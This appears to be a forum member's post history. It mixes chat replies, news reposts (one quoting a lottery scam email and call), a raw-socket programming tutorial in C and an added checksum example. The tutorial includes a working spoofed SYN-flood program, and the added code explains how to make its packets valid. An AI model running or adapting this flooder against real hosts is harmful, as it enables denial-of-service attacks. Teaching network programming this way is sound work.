Nytro
Administrators
Posts: 18592
Days Won: 644

Everything posted by Nytro

  1. Manea

    The best manea, specially for those who hate manele: http://www.netdrive.ws/198905.html I'm sure you'll like the lyrics. Too good, I swear )
  2. What the hell, you want to download everything you find? Give him a ban.
  3. What doesn't work, does it give some error? Is the ocx copied into system32? Is there a Skins folder there that contains the skin?
  4. Counter Strike 1.6 and that's about it. And that only when I have nothing to do.
  5. www.mail.yahoo.com You log in correctly 3 times, until it works. Make sure you don't get the details wrong. After you've got into the mail, "voilà".
  6. Anything! All languages, broadly speaking, are the same. In any language there is a for, a while, an if. In any language there are functions. Functions are the basis of languages. Learn any language, then it will be very easy to learn any other language.
  7. Sorinel Pustiu - Barosanu no. 1
  8. UPDATE: Microsoft will launch Windows 7 in Romanian on October 31
by Catalin Calciu | 26 June 2009

The Romanian version of Microsoft's new operating system, Windows 7, will be launched on October 31, nine days after the English version reaches the market, company representatives told Hotnews.ro. In Romania, the estimated price of a Windows 7 license during the promotional period, which will last until December 31, 2009, will be 119.99 euro for the Home Premium edition (a discount of about 110 euro compared to the current price of Windows Vista Home Premium). On Thursday the company announced the Windows 7 launch dates for several countries; the USA, Canada and Japan are the first where the system will go on sale, starting Friday. On July 15 Windows 7 will reach three more markets: France, Germany and the United Kingdom, though it should be noted that in the EU the Internet Explorer browser will no longer be included in the package. By October 22, the worldwide launch date, versions in 14 languages will be ready: English, Spanish, Japanese, German, French, Italian, Dutch, Russian, Polish, Portuguese, Korean and Chinese (three versions). On October 31, Windows 7 will be available in another 21 languages, including Bulgarian, Ukrainian, Thai, Croatian, Greek, Turkish and, of course, Romanian. Without a discount, a Windows 7 license in the USA will cost customers who already have Vista or XP 119.99 dollars for the Home Premium edition, 199.99 dollars for Professional and 219.99 dollars for Ultimate. For entirely new customers the prices of the three editions are 199.99, 299.99 and 319.99 dollars. The company offers a discount to those who move from XP or Vista to Windows 7 by July 11 in the USA: they can buy Windows Home Premium for 49.99 dollars.

In Romania, Windows 7 will have a promotional price of 119.99 euro for the Home Premium edition. Microsoft Romania officials told HotNews.ro that "the Windows 7 Upgrade Option gives any buyer who purchases a PC with Windows Vista Home Premium, Windows Vista Business or Windows Vista Ultimate from an OEM or retail partner participating in the upgrade program the possibility to upgrade to Windows 7 at no additional cost. This is a global program and will be valid until January 31, 2010." At first glance the prices are comparable to those of the current Windows Vista, but there are special prices for those who only want an upgrade from Windows XP or Vista: they will have to pay 119.99 dollars for Windows 7 Home Premium, 199.99 dollars for Professional and 219.99 dollars for Ultimate. Source: Vlad Barza / Hotnews.ro
  9. Security experts made contact with online criminals
by Vlad Matei | 1 July 2009

To be a millionaire and swim in money won at the lottery: a dream shared by millions of people all over the globe. Fulfilling this dream is the promise made by the latest wave of spam messages. In these e-mails the sender promises a prize of 2 million 35 thousand and asks you in exchange to contact him as soon as possible by telephone. According to police estimates, this scam is related to fraudulent bank transfers or even money laundering. To find out more about this, G Data started an investigation and contacted the body responsible for monitoring lotteries in the EU, located in Madrid. "This scam is not a new one, but the fact that this time the people behind it have a telephone number available that is not fictitious is a novelty. In general, the scammers want to obtain personal information or information about the accounts of the people targeted by the fraud attempt. The latest 'wave' of spam is most likely a money-laundering campaign. Therefore, our advice is that they be detected immediately," says Ralf Benzmüller, manager of G Data Security Labs. German police officials, contacted by the G Data specialists, confirmed these estimates and warn that under no circumstances should anyone get in touch with the body responsible for monitoring lotteries in the EU. G Data wanted to know what was really going on, so a company representative called the number in Madrid. The phone was answered by a friendly individual who spoke German and introduced himself as an employee of the body responsible for monitoring lotteries in the EU. He said he could not give details about the winnings because his role is only to collect contact details.

In any case, he confirmed to the G Data representative that the amount of 2.35 million euro is correct, but that it may vary. He claimed his name is Randy Peters. G Data immediately passed the collected data on to the legal authorities competent to handle the case.

Summary of the telephone conversation with RANDY PETERS:
G Data: Hello, am I speaking with the European Lotto Monitoring Unit? I was notified that I won a prize.
RANDY PETERS: Who would you like to speak to? I didn't understand exactly.
G Data: I just received an e-mail from Mr. Hernandez and I'm very eager to know what happens now.
RANDY PETERS: Ah, you're calling because of the message from Lotto Monitoring. What did you say your name was?
G Data: My name is A.....
RANDY PETERS: Could you repeat that, please. I don't speak German very well.
Typing on a keyboard can be heard in the background. The operator seems to be looking up the name in a database, to see whether it is someone who received spam from them.
RANDY PETERS: Unfortunately, I can't find your name in the database. Could you tell me your telephone number?
I gave the interlocutor a special number set up for this purpose.
G Data: Did I really win? Is it really 2.35 million euro?
RANDY PETERS: Yes, the amount won is 2.35 million euro. That's right. We collect information which we pass on to Lotto Monitoring for processing and payment of the sum.
G Data: How long will it take until I get the money? Do I get all of it?
RANDY PETERS: Yes, of course. I can't tell you an exact amount, because the prize will be split. It might be smaller. I need your address, your telephone number and your bank details for further processing. This information is passed on to the European Lotto Monitoring Unit. I only collect this information.
G Data: Is there any fee I have to pay? I'm not very good at these things. Do I have to transfer money to someone first, or what is the procedure? I've heard about frauds.
RANDY PETERS: No, no. We just give you the money. It will arrive in your account in a few weeks. There are no fees apart from the processing ones. That is, 3.5% of the winnings, from the account into which we make the transfer, for example. So, can you give me this information?
G Data: The telephone connection is not very good. Can I send you the data by e-mail? To Mr. Hernandez's address?
RANDY PETERS: Yes, that's OK. Please make sure all the details are included; then you'll receive the first instalment of the money in the first week. You just have to transfer the processing amount after you receive the money.
At this point, the G Data experts ended the telephone conversation.

Spam e-mail from the European Lotto Monitoring Unit:
European Lotto Monitoring Unit (Lotto processing department)
DIRECTORATE OF INTERNATIONAL PAYMENTS AND TRANSFERS
Paseo de Castellana 64
E-28048 Madrid, Spain
22/06/2009
Payment processing/audit department
Internal number: ELM/PD/MU/SX027
Re: Irrevocable payment
We have just been authorized by the President of the European Lotto Monitoring Unit and by the Board of Directors of the Central Bank of Spain (Bank of Spain) to investigate the reasons for the unjustified delay of the payment; we recommend that you verify whether your payment requests are justified. During our investigation we discovered, to our surprise, that the payments were delayed by corrupt officials in the organization who are attempting to divert your funds into their own accounts. To stop this, security measures were taken for the money, in the form of securing your money with a personal identification code (PIN) and a Transfer Access Code (TAC). This means that you will be the only person who directly controls the sum of money. Furthermore, we have concluded an agreement with the presidency, which will handle the payments, to prevent exceptional situations like those caused by the lottery officials from happening again. In addition, we have received irrevocable payment guarantees for you from the presidency. We are pleased to inform you that, thanks to our recommendations, the full amount granted to you can be paid by credit transfer or through partner foreign banks. Moreover, our unit will provide you with a lawyer who will answer all your questions about the transfer and who will guarantee the security of your money. Therefore, please contact the lawyer RANDY PETERS at TEL: +34 645 XXX XXX ; FAX: 34 911 XXX XXX so that the transfer into your account can be carried out with the help of the PIN and TAC codes. He will take your calls. As soon as the process is complete, you will receive the sum of 2,350,000 euro (two million three hundred and fifty thousand) directly into your account. We await your reply as soon as possible, in order to expedite the process. Sincerely, JOSE M. HERNANDEZ, GENERAL DIRECTOR
  10. The Pirate Bay sold, will give up the tracker and the illegal torrents
by Andrei Rahmanov | 1 July 2009

A black day for internet piracy. The Pirate Bay site has been sold and it appears that very soon it will cease all hosting and illegal file-sharing activities. The Pirate Bay (TPB) is one of the largest and best-known file-sharing sites on the internet. Over 90% of the files downloaded from this site were illegal torrents of copyrighted material. Although TPB claims it will try to find a way to offer its users the same content as before, free of charge, things do not look that simple. The company that has just bought TPB, Global Gaming Factory X (GGF), is publicly traded on the stock exchange and will not be able to afford getting into the same legal troubles over illegally distributed material, troubles which recently forced TPB to pay 3.9 million dollars in fines and court costs. At least for the moment, it has been announced that The Pirate Bay will shut down its BitTorrent client and will no longer host torrents. TPB claims this measure is meant to decentralize the torrent world to some extent and to make users less dependent on upload time from TPB's servers. Along with the site, the company that owned it, Peerialism, was also sold; it announced that it has a new peer-to-peer file-sharing system which will replace the old one.

Even though the site had millions of visitors daily until now, advertising revenue would not be enough to pay the copyright for all the files made available on the site, so for most of them downloading might become paid. Since a true pirate would never pay for files that he can get elsewhere for free, it is estimated that TPB's traffic will drop drastically in the coming period and its users will head to other sites of the kind. The site was bought by Global Gaming Factory X (GGF) for 7.8 million dollars, a sum that represents double the costs of the trial recently lost by The Pirate Bay. The surplus money resulting from the sale will go to a foundation campaigning for "the right to free expression".
  11. A brief programming tutorial in C for raw sockets
by Mixter for the BlackCode Magazine

1. Raw sockets
2. The protocols IP, ICMP, TCP and UDP
3. Building and injecting datagrams
4. Basic transport layer operations

In this tutorial, you'll learn the basics of using raw sockets in C, to insert any IP protocol based datagram into the network traffic. This is useful, for example, to build raw socket scanners like nmap, to spoof, or to perform operations that need to send out raw sockets. Basically, you can send any packet at any time, whereas using the interface functions for your system's IP stack (connect, write, bind, etc.) you have no direct control over the packets. This theoretically enables you to simulate the behavior of your OS's IP stack, and also to send stateless traffic (datagrams that don't belong to a valid connection). For this tutorial, all you need is a minimal knowledge of socket programming in C (see Beej's Guide to Network Programming).

I. Raw sockets

The basic concept of low level sockets is to send a single packet at one time, with all the protocol headers filled in by the program (instead of the kernel). Unix provides two kinds of sockets that permit direct access to the network. One is SOCK_PACKET, which receives and sends data on the device link layer. This means the NIC specific header is included in the data that will be written or read. For most networks, this is the ethernet header. Of course, all subsequent protocol headers will also be included in the data. The socket type we'll be using, however, is SOCK_RAW, which includes the IP header and all subsequent protocol headers and data. The (simplified) layer model looks like this:

Physical layer -> Device layer (Ethernet protocol) -> Network layer (IP) -> Transport layer (TCP, UDP, ICMP) -> Session layer (application specific data)

Now to some practical stuff. A standard command to create a datagram socket is:

    socket (PF_INET, SOCK_RAW, IPPROTO_UDP);

From the moment that it is created, you can send any IP packets over it, and receive any IP packets that the host received after that socket was created if you read() from it. Note that even though the socket is an interface to the IP header, it is transport layer specific. That means, for listening to TCP, UDP and ICMP traffic, you have to create 3 separate raw sockets, using IPPROTO_TCP, IPPROTO_UDP and IPPROTO_ICMP (the protocol numbers are 0 or 6 for tcp, 17 for udp and 1 for icmp). With this knowledge we can, for example, already create a small sniffer that dumps out the contents of all tcp packets we receive. (Headers, etc. are missing, this is just an example. As you see, we are skipping the IP and TCP headers which are contained in the packet, and print out the payload, the data of the session/application layer, only.)

    int fd = socket (PF_INET, SOCK_RAW, IPPROTO_TCP);
    char buffer[8192]; /* single packets are usually not bigger than 8192 bytes */
    int n;
    while ((n = read (fd, buffer, sizeof (buffer) - 1)) > 0)
      {
        if (n <= (int) (sizeof (struct iphdr) + sizeof (struct tcphdr)))
          continue; /* nothing behind the headers */
        buffer[n] = '\0'; /* terminate, so the payload can be printed as a string */
        printf ("Caught tcp packet: %s\n", buffer + sizeof (struct iphdr) + sizeof (struct tcphdr));
      }

II. The protocols IP, ICMP, TCP and UDP

To inject your own packets, all you need to know is the structures of the protocols that need to be included. Below you will find a short introduction to the IP, ICMP, TCP and UDP headers. It is recommended to build your packet by using a struct, so you can comfortably fill in the packet headers. Unix systems provide standard structures in the header files (e.g. <netinet/ip.h>). You can always create your own structs, as long as the length of each option is correct. To help you create portable programs, we'll use the BSD names in our structures. We'll also use the little endian notation. On big endian machines (some other processor architectures than intel x86), the 4 bit-size variables exchange places. However, one can always use the structures in the same way in this program. Below each header structure is a short explanation of its members, so that you know what values should be filled in and which meaning they have. The data types/sizes we need to use are: unsigned char - 1 byte (8 bits), unsigned short int - 2 bytes (16 bits) and unsigned int - 4 bytes (32 bits).

    struct ipheader {
      unsigned char ip_hl:4, ip_v:4; /* this means that each member is 4 bits */
      unsigned char ip_tos;
      unsigned short int ip_len;
      unsigned short int ip_id;
      unsigned short int ip_off;
      unsigned char ip_ttl;
      unsigned char ip_p;
      unsigned short int ip_sum;
      unsigned int ip_src;
      unsigned int ip_dst;
    }; /* total ip header length: 20 bytes (=160 bits) */

The Internet Protocol is the network layer protocol, used for routing the data from the source to its destination. Every datagram contains an IP header followed by a transport layer protocol such as tcp.

ip_hl: the ip header length in 32bit octets. this means a value of 5 for the hl means 20 bytes (5 * 4). values other than 5 only need to be set if the ip header contains options (mostly used for routing)
ip_v: the ip version is always 4 (maybe I'll write an IPv6 tutorial later;)
ip_tos: type of service controls the priority of the packet. 0x00 is normal. the first 3 bits stand for routing priority, the next 4 bits for the type of service (delay, throughput, reliability and cost).
ip_len: total length must contain the total length of the ip datagram. this includes ip header, icmp or tcp or udp header and payload size in bytes.
ip_id: the id sequence number is mainly used for reassembly of fragmented IP datagrams. when sending single datagrams, each can have an arbitrary ID.
ip_off: the fragment offset is used for reassembly of fragmented datagrams. the first 3 bits are the fragment flags, the first one always 0, the second the do-not-fragment bit (set by ip_off |= 0x4000) and the third the more-flag or more-fragments-following bit (ip_off |= 0x2000). the following 13 bits are the fragment offset, containing the number of 8-byte blocks already sent.
ip_ttl: time to live is the amount of hops (routers to pass) before the packet is discarded, and an icmp error message is returned. the maximum is 255.
ip_p: the transport layer protocol. can be tcp (6), udp (17), icmp (1), or whatever protocol follows the ip header. look in /etc/protocols for more.
ip_sum: the datagram checksum for the whole ip datagram. every time anything in the datagram changes, it needs to be recalculated, or the packet will be discarded by the next router. see V. for a checksum function.
ip_src and ip_dst: source and destination IP address, converted to long format, e.g. by inet_addr(). both can be chosen arbitrarily.

IP itself has no mechanism for establishing and maintaining a connection, or even containing data as a direct payload. Internet Control Messaging Protocol is merely an addition to IP to carry error, routing and control messages and data, and is often considered as a protocol of the network layer.

    struct icmpheader {
      unsigned char icmp_type;
      unsigned char icmp_code;
      unsigned short int icmp_cksum;
      /* The following data structures are ICMP type specific */
      unsigned short int icmp_id;
      unsigned short int icmp_seq;
    }; /* total icmp header length: 8 bytes (=64 bits) */

icmp_type: the message type, for example 0 - echo reply, 8 - echo request, 3 - destination unreachable. look in <netinet/ip_icmp.h> for all the types.
icmp_code: this is significant when sending an error message (unreach), and specifies the kind of error. again, consult the include file for more.
icmp_cksum: the checksum for the icmp header + data. same as the IP checksum.
Note: The next 32 bits in an icmp packet can be used in many different ways. This depends on the icmp type and code. the most commonly seen structure, an ID and sequence number, is used in echo requests and replies, hence we only use this one, but keep in mind that the header is actually more complex.
icmp_id: used in echo request/reply messages, to identify the request
icmp_seq: identifies the sequence of echo messages, if more than one is sent.

The User Datagram Protocol is a transport protocol for sessions that need to exchange data. Both transport protocols, UDP and TCP, provide 65535 different source and destination ports. The destination port is used to connect to a specific service on that port. Unlike TCP, UDP is not reliable, since it doesn't use sequence numbers and stateful connections. This means UDP datagrams can be spoofed, and might not be reliable (e.g. they can be lost unnoticed), since they are not acknowledged using replies and sequence numbers.

    struct udpheader {
      unsigned short int uh_sport;
      unsigned short int uh_dport;
      unsigned short int uh_len;
      unsigned short int uh_check;
    }; /* total udp header length: 8 bytes (=64 bits) */

uh_sport: The source port that a client bind()s to, and the contacted server will reply back to in order to direct its responses to the client.
uh_dport: The destination port that a specific server can be contacted on.
uh_len: The length of udp header and payload data in bytes.
uh_check: The checksum of header and data, see IP checksum.

The Transmission Control Protocol is the most used transport protocol that provides mechanisms to establish a reliable connection with some basic authentication, using connection states and sequence numbers. (See IV. Basic transport layer operations.)

    struct tcpheader {
      unsigned short int th_sport;
      unsigned short int th_dport;
      unsigned int th_seq;
      unsigned int th_ack;
      unsigned char th_x2:4, th_off:4;
      unsigned char th_flags;
      unsigned short int th_win;
      unsigned short int th_sum;
      unsigned short int th_urp;
    }; /* total tcp header length: 20 bytes (=160 bits) */

th_sport: The source port, which has the same function as in UDP.
th_dport: The destination port, which has the same function as in UDP.
th_seq: The sequence number is used to enumerate the TCP segments. The data in a TCP connection can be contained in any amount of segments (=single tcp datagrams), which will be put in order and acknowledged. For example, if you send 3 segments, each containing 32 bytes of data, the first sequence would be (N+)1, the second one (N+)33 and the third one (N+)65. "N+" because the initial sequence is random.
th_ack: Every packet that is sent and a valid part of a connection is acknowledged with an empty TCP segment with the ACK flag set (see below), and the th_ack field containing the previous th_seq number.
th_x2: This is unused and contains binary zeroes.
th_off: The segment offset specifies the length of the TCP header in 32bit/4byte blocks. Without tcp header options, the value is 5.
th_flags: This field consists of six binary flags. Using bsd headers, they can be combined like this: th_flags = FLAG1 | FLAG2 | FLAG3...
  TH_URG: Urgent. Segment will be routed faster, used for termination of a connection or to stop processes (using telnet protocol).
  TH_ACK: Acknowledgement. Used to acknowledge data and in the second and third stage of a TCP connection initiation (see IV.).
  TH_PSH: Push. The system's IP stack will not buffer the segment and forward it to the application immediately (mostly used with telnet).
  TH_RST: Reset. Tells the peer that the connection has been terminated.
  TH_SYN: Synchronization. A segment with the SYN flag set indicates that the client wants to initiate a new connection to the destination port.
  TH_FIN: Final. The connection should be closed, the peer is supposed to answer with one last segment with the FIN flag set as well.
th_win: Window. The amount of bytes that can be sent before the data should be acknowledged with an ACK before sending more segments.
th_sum: The checksum of pseudo header, tcp header and payload. The pseudo header is a structure containing IP source and destination address, 1 byte set to zero, the protocol (1 byte with a decimal value of 6), and 2 bytes (unsigned short) containing the total length of the tcp segment.
th_urp: Urgent pointer. Only used if the urgent flag is set, else zero. It points to the end of the payload data that should be sent with priority.

III. Building and injecting datagrams

Now, by putting together the knowledge about the protocol header structures with some basic C functions, it is easy to construct and send any datagram(s). We will demonstrate this with a small sample program that constantly sends out SYN requests to one host (SYN flooder).

    #define __USE_BSD         /* use bsd'ish ip header */
    #include <sys/socket.h>   /* these headers are for a Linux system, but */
    #include <netinet/in.h>   /* the names on other systems are easy to guess.. */
    #include <netinet/ip.h>
    #define __FAVOR_BSD       /* use bsd'ish tcp header */
    #include <netinet/tcp.h>
    #include <unistd.h>
    #include <arpa/inet.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    #define P 25 /* lets flood the sendmail port */

    unsigned short /* this function generates header checksums */
    csum (unsigned short *buf, int nwords)
    {
      unsigned long sum;
      for (sum = 0; nwords > 0; nwords--)
        sum += *buf++;
      sum = (sum >> 16) + (sum & 0xffff);
      sum += (sum >> 16);
      return ~sum;
    }

    int
    main (void)
    {
      int s = socket (PF_INET, SOCK_RAW, IPPROTO_TCP); /* open raw socket (needs root) */
      char datagram[4096]; /* this buffer will contain ip header, tcp header, and payload.
                              we'll point an ip header structure at its beginning, and a
                              tcp header structure after that to write the header values into it */
      struct ip *iph = (struct ip *) datagram;
      struct tcphdr *tcph = (struct tcphdr *) (datagram + sizeof (struct ip)); /* add first, then cast, so the offset is in bytes */
      struct sockaddr_in sin; /* the sockaddr_in containing the dest. address is used in sendto() to determine the datagram's path */

      if (s < 0)
        {
          perror ("socket");
          return 1;
        }

      sin.sin_family = AF_INET;
      sin.sin_port = htons (P); /* you byte-order >1byte header values to network byte order (not needed on big endian machines) */
      sin.sin_addr.s_addr = inet_addr ("127.0.0.1");

      memset (datagram, 0, 4096); /* zero out the buffer */

      /* we'll now fill in the ip/tcp header values, see above for explanations */
      iph->ip_hl = 5;
      iph->ip_v = 4;
      iph->ip_tos = 0;
      iph->ip_len = sizeof (struct ip) + sizeof (struct tcphdr); /* no payload */
      iph->ip_id = htons (54321); /* the value doesn't matter here (16-bit field, so htons) */
      iph->ip_off = 0;
      iph->ip_ttl = 255;
      iph->ip_p = 6;
      iph->ip_sum = 0; /* set it to 0 before computing the actual checksum later */
      iph->ip_src.s_addr = inet_addr ("1.2.3.4"); /* SYN's can be blindly spoofed */
      iph->ip_dst.s_addr = sin.sin_addr.s_addr;

      tcph->th_sport = htons (1234); /* arbitrary port */
      tcph->th_dport = htons (P);
      tcph->th_seq = random (); /* in a SYN packet, the sequence is a random */
      tcph->th_ack = 0;         /* number, and the ack sequence is 0 in the 1st packet */
      tcph->th_x2 = 0;
      tcph->th_off = 5; /* tcp header length in 32-bit words: 20 bytes, no options */
      tcph->th_flags = TH_SYN; /* initial connection request */
      tcph->th_win = htons (65535); /* maximum allowed window size (16-bit field, so htons) */
      tcph->th_sum = 0; /* must be 0 while the checksum is computed */
      tcph->th_urp = 0;

      /* the tcp checksum covers a pseudo header (src, dst, zero, protocol, tcp length)
         followed by the tcp header; the kernel does not fill it in for a raw socket,
         so compute it here */
      {
        struct
        {
          unsigned int src, dst;
          unsigned char zero, proto;
          unsigned short len;
        } ph;
        unsigned short pbuf[(sizeof (ph) + sizeof (struct tcphdr)) / 2];
        ph.src = iph->ip_src.s_addr;
        ph.dst = iph->ip_dst.s_addr;
        ph.zero = 0;
        ph.proto = IPPROTO_TCP;
        ph.len = htons (sizeof (struct tcphdr));
        memcpy (pbuf, &ph, sizeof (ph));
        memcpy ((char *) pbuf + sizeof (ph), tcph, sizeof (struct tcphdr));
        tcph->th_sum = csum (pbuf, sizeof (pbuf) / 2);
      }

      iph->ip_sum = csum ((unsigned short *) datagram, sizeof (struct ip) >> 1); /* the ip checksum covers the ip header only */

      /* finally, it is very advisable to do a IP_HDRINCL call, to make sure that
         the kernel knows the header is included in the data, and doesn't insert
         its own header into the packet before our data */
      { /* lets do it the ugly way.. */
        int one = 1;
        const int *val = &one;
        if (setsockopt (s, IPPROTO_IP, IP_HDRINCL, val, sizeof (one)) < 0)
          printf ("Warning: Cannot set HDRINCL!\n");
      }

      while (1)
        {
          if (sendto (s,                        /* our socket */
                      datagram,                 /* the buffer containing headers and data */
                      iph->ip_len,              /* total length of our datagram */
                      0,                        /* routing flags, normally always 0 */
                      (struct sockaddr *) &sin, /* socket addr, just like in */
                      sizeof (sin)) < 0)        /* a normal send() */
            printf ("error\n");
          else
            printf (".");
        }
      return 0;
    }

IV. Basic transport layer operations

To make use of raw packets, knowledge of the basic IP stack operations is essential. I'll try to give a brief introduction into the most important operations in the IP stack. To learn more about the behavior of the protocols, one option is to examine the source for your system's IP stack, which, in Linux, is located in the directory /usr/src/linux/net/ipv4/. The most important protocol, of course, is TCP, on which I will focus.

Connection initiation: to contact a udp or tcp server listening on port 1234, the client calls a connect() with the sockaddr structure containing destination address and port. If the client did not bind() to a source port, the system's IP stack will select one it'll bind to. By connect()ing, the host sends a datagram containing the following information: IP src: client address, IP dest: server's address, TCP/UDP src: client's source port, TCP/UDP dest: port 1234. If a client is located on port 1234 on the destination host, it will reply back with a datagram containing: IP src: server, IP dst: client, srcport: server port, dstport: client's source port. If there is no server located on the host, an ICMP type unreach message is created, subcode "Connection refused". The client will then terminate. If the destination host is down, either a router will create a different ICMP unreach message, or the client gets no reply and the connection times out.

TCP initiation ("3-way handshake") and connection: The client will do a connection initiation, with the tcp SYN flag set, an arbitrary sequence number, and no acknowledgement number. The server acknowledges the SYN by sending a packet with SYN and ACK set, another random sequence number and the acknowledgement number the original sequence. Finally, the client replies back with a tcp datagram with the ACK flag set, and the server's ack sequence incremented by one. Once the connection is established, each tcp segment will be sent with no flags (PSH and URG are optional), the sequence number for each packet incremented by the size of the previous tcp segment. After the amount of data specified as "window size" has been transferred, the peer sending data will wait for an acknowledgement, a tcp segment with the ACK flag set and the ack sequence number the one of the last data packet that could be received in order. That way, if any segments get lost, they will not be acknowledged and can be retransmitted. To end a connection, both server and client send a tcp packet with correct sequence numbers and the FIN flag set, and if the connection ever de-synchronizes (aborted, desynchronized, bad sequence numbers, etc.) the peer that notices the error will send a RST packet with correct seq numbers to terminate the connection.

- Mixter
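The following is an added example and is not part of Mixter's tutorial or of the post above. It shows the checks a scanner or sniffer built on the sections above should run on a datagram it receives before trusting it: a bounds check on every length field, option-aware offsets (ip_hl and th_off, which the sniffer snippet in section I ignores), and verification of both the IP header checksum and the TCP checksum over the pseudo header from section II. The same two checksum routines fill in a SYN like the one the flooder in section III builds. On Linux, a raw IPPROTO_TCP socket with IP_HDRINCL fills in the IP checksum for you but not the TCP one, so a SYN sent with th_sum = 0 is dropped by the receiver. Byte-oriented arithmetic is used instead of the structs so the result does not depend on host byte order and it runs without a raw socket. The SYN in syn_selfcheck() is constructed for this example (arbitrary addresses, ports and TTL); kSampleIpHeader is the widely used worked-example IPv4 header whose checksum is 0xb861.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* RFC 1071 one's-complement sum over big-endian 16-bit words, folded to 16
   bits. 'sum' lets a caller chain the pseudo header and the segment. */
static uint32_t ones_sum(const uint8_t *p, size_t len, uint32_t sum)
{
    for (; len > 1; p += 2, len -= 2)
        sum += ((uint32_t)p[0] << 8) | p[1];
    if (len)
        sum += (uint32_t)p[0] << 8;                 /* odd trailing byte */
    while (sum >> 16)
        sum = (sum & 0xffffu) + (sum >> 16);
    return sum;
}

/* Internet checksum of a buffer, as the big-endian value to store. */
uint16_t inet_checksum(const uint8_t *p, size_t len)
{
    return (uint16_t)~ones_sum(p, len, 0);
}

/* TCP checksum: pseudo header (src, dst, zero, protocol 6, tcp length)
   followed by the TCP header and payload; ihl is the IP header length. */
uint16_t tcp_checksum(const uint8_t *ip, size_t ihl, size_t tcplen)
{
    uint8_t pseudo[12];
    memcpy(pseudo, ip + 12, 8);                     /* source + destination */
    pseudo[8] = 0;
    pseudo[9] = 6;
    pseudo[10] = (uint8_t)(tcplen >> 8);
    pseudo[11] = (uint8_t)tcplen;
    return (uint16_t)~ones_sum(ip + ihl, tcplen, ones_sum(pseudo, 12, 0));
}

/* Validate a received IPv4/TCP datagram of 'len' bytes and return the offset
   of the application payload, or -1 if anything is inconsistent. */
int tcp_payload_offset(const uint8_t *pkt, size_t len)
{
    if (len < 20 || (pkt[0] >> 4) != 4) return -1;          /* not IPv4 */
    size_t ihl = (size_t)(pkt[0] & 0x0f) * 4;
    size_t total = ((size_t)pkt[2] << 8) | pkt[3];
    if (ihl < 20 || total < ihl + 20 || total > len) return -1; /* lengths */
    if (pkt[9] != 6) return -1;                              /* not TCP */
    if (ones_sum(pkt, ihl, 0) != 0xffffu) return -1;         /* IP checksum */
    size_t tcplen = total - ihl;
    size_t thl = (size_t)(pkt[ihl + 12] >> 4) * 4;           /* th_off */
    if (thl < 20 || thl > tcplen) return -1;                 /* data offset */
    if (tcp_checksum(pkt, ihl, tcplen) != 0) return -1;      /* TCP checksum */
    return (int)(ihl + thl);
}

static void put16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)(v >> 8); p[1] = (uint8_t)v; }
static void put32(uint8_t *p, uint32_t v) { put16(p, (uint16_t)(v >> 16)); put16(p + 2, (uint16_t)v); }

/* Build a 40-byte IPv4/TCP SYN (no options, no payload) with both checksums
   filled in; addresses and ports are given in host order. Returns the length. */
size_t build_syn(uint8_t *out, uint32_t src, uint32_t dst,
                 uint16_t sport, uint16_t dport, uint32_t seq, uint8_t ttl)
{
    uint8_t *ip = out, *tcp = out + 20;
    memset(out, 0, 40);
    ip[0] = 0x45;                                   /* version 4, ihl 5 */
    put16(ip + 2, 40);                              /* total length */
    ip[8] = ttl;
    ip[9] = 6;                                      /* protocol TCP */
    put32(ip + 12, src);
    put32(ip + 16, dst);
    put16(tcp, sport);
    put16(tcp + 2, dport);
    put32(tcp + 4, seq);                            /* ack stays 0 in a SYN */
    tcp[12] = 5 << 4;                               /* th_off = 5 words */
    tcp[13] = 0x02;                                 /* TH_SYN */
    put16(tcp + 14, 65535);                         /* window */
    put16(ip + 10, inet_checksum(ip, 20));          /* IP header only */
    put16(tcp + 16, tcp_checksum(ip, 20, 20));      /* pseudo header + TCP */
    return 40;
}

/* Worked-example IPv4 header (UDP, total length 115), checksum bytes zeroed;
   the correct checksum is 0xb861. */
const uint8_t kSampleIpHeader[20] = {
    0x45, 0x00, 0x00, 0x73, 0x00, 0x00, 0x40, 0x00, 0x40, 0x11,
    0x00, 0x00, 0xc0, 0xa8, 0x00, 0x01, 0xc0, 0xa8, 0x00, 0xc7 };

/* Constructed SYN 10.0.0.1:1234 -> 10.0.0.2:25, seq 0, ttl 255: hand-computed
   checksums are 0xa7cd (IP) and 0x96f5 (TCP). Returns 1 if building works and
   a truncated or bit-flipped copy is rejected. */
int syn_selfcheck(void)
{
    uint8_t pkt[40];
    size_t n = build_syn(pkt, 0x0a000001u, 0x0a000002u, 1234, 25, 0, 255);
    if (n != 40 || pkt[10] != 0xa7 || pkt[11] != 0xcd) return 0;
    if (pkt[36] != 0x96 || pkt[37] != 0xf5) return 0;
    if (tcp_payload_offset(pkt, n) != 40) return 0;      /* valid, no payload */
    if (tcp_payload_offset(pkt, n - 1) != -1) return 0;  /* short read */
    pkt[13] ^= 0x10;                                     /* flip ACK flag */
    if (tcp_payload_offset(pkt, n) != -1) return 0;      /* checksum now wrong */
    return 1;
}

int main(void)
{
    uint8_t pkt[40];
    build_syn(pkt, 0x0a000001u, 0x0a000002u, 1234, 25, 0, 255);
    printf("ip_sum=%02x%02x th_sum=%02x%02x payload_offset=%d selfcheck=%d\n",
           pkt[10], pkt[11], pkt[36], pkt[37], tcp_payload_offset(pkt, 40), syn_selfcheck());
    return 0;
}
```

To use this with the flooder, copy the 40 bytes of build_syn() into the datagram buffer in place of the struct writes; to use it with the sniffer, pass the bytes returned by read() to tcp_payload_offset() and print only from the returned offset up to the IP total length, not to the end of the buffer.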
  12. [VB6] mAnti

    That seems normal to me. Yes.
  13. I installed Windows 7 a while ago too, back when it was Beta, and I couldn't get into any folder, neither My Computer nor Control Panel. And since then the idea of trying it hasn't appealed to me. But maybe I will try it. However, I don't think anything other than XP is needed. It has everything you need, everything an operating system should have.
  14. =======================================
    |-----------:[iNFO]:------------------|
    |-------------------------------------|
    | Title: "Linux Hardening & Security" |
    | Author: Krun!x | QK                 |
    | E-Mail: only4lul@gmail.com          |
    | Home: madspot.org | ljuska.org      |
    | Date: 2009-06-20                    |
    =======================================

    Content:
    1) Introduction
    2) cP/WHM Installation and cP/WHM Configuration
    3) The server and its services | PHP Installation, Optimization & Security
    4) Kernel Hardening | Linux Kernel + Grsecurity Patch
    5) SSH
    6) Firewall | DDoS Protection
    7) Mod_Security
    8) Anti-Virus - ClamAV
    9) Rootkit
    10) The Rest of Shits

    ===================
    | 1) Introduction |
    ===================

